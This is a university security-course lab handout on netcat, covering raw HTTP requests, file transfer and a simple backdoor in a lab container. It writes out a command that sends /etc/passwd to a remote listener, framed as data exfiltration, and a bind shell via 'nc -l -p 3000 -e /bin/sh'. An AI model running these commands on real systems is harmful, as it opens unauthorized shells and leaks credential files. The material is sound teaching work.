Introduction to System Security

Northwestern CS, Winter Quarter 2023

Netcat

Introduction

Netcat is described as the swiss army knife of TCP/IP. It does a lot, and knowing how to use it can be invaluable in security. It's not the optimal tool for many jobs, but it's a lot quicker to use than reinventing the wheel.

Setup

To start the lab clone the 354 repo (if you haven't) and run the script for the lab.

git clone https://github.com/cs354/CS-354.git
bash CS-354/labs/ncat.bash

Since ncat is a network tool we need a separate client to make connections to this server. Open up your student environment in a separate shell this will be your client. Keep both open side by side.

bash CS-354/student_environment.bash

Basic usage

Netcat's most simplistic function can be seen as a replacement to telnet. Try the following in the client:

$ nc www.google.com 80
GET / HTTP/1.1^M
Host: www.google.com^M
^M

Where it says ^M, you actually have to press control-v and then enter. This is to produce a carriage return as required by HTTP. Optionally, you can add more headers to your request:

$ nc www.google.com 80
GET / HTTP/1.1^M
Host: www.google.com^M
Accept: text/html;q=0.9,text/plain;q=0.8^M
User-Agent: Mozilla/5.0 (Unknown; en-us)^M
Accept-Language: en-us,en;q=0.5^M
^M

Another way to do this (which allows you to avoid pressing control-v all the time) is to pipe the output of some command to netcat. Here's an example:

$ ruby -e 'print "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n"' | nc www.google.com 80

Common command line flags

• -l Sets up netcat to listen for incoming TCP connections. You'll want to use this in conjunction with the -p flag.
• -p Specifies a port for netcat to listen on.
• -vv Sets the verbosity level
• -n Disables IP resolution
• -e Execute a command

Transferring files

One thing you might come across is a host you can access, but it's hard to get files onto their machine. Netcat can easily transfer files for you. On the machine that you want to receive the file (we'll use the student env container for this as if we are exfiltrating data from a server)

$ nc -vv -l -p 3000 > file

And on the machine from which you want to send the file (the other shell):

$ nc -vv hostname 3000 < /etc/passwd

Replace hostname with cs354-local (or cs354-NETID on vicious).

These simple commands just shovel the contents of a file over a TCP/IP connection. If you try this, note that in many cases these transfers will be filtered by a firewall. Try transfering a file from a machine in the Wilkinson lab to hamsa.

Creating a simple backdoor

Netcat has the ability to execute programs when it receives a connection. This feature can be used to easily create a back door to a machine. (On the server)

$ nc -l -p 3000 -e /bin/sh

And now from your student environment (replace ncat-local with ncat-NETID if on vicious):

$ nc ncat-local 3000

Then try tying 'ls' or anything other command.

reverse-shell-cheat-sheet/

Additional

There is a lot that you can do with netcat. A short tutorial doesn't quite do it justice. If you have time, it would be good to read through the man page (man netcat) or to search online for things to try with it.

Classwork

Upload a PDF file on canvas containing screenshots to show you've done the following work. Show that you can successfully download the webpage www.google.com. We expect to see HTTP response from google.com. Transfer an arbitrary file using netcat. We expect to see screenshots of two terminals sending and receiving the file. Show that you can create a netcat backdoor and demonstrate an understanding of netcat's usefulness as a TCP client and server. We expect to see screenshots of the client connecting to the server and doing some command line operations.

Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.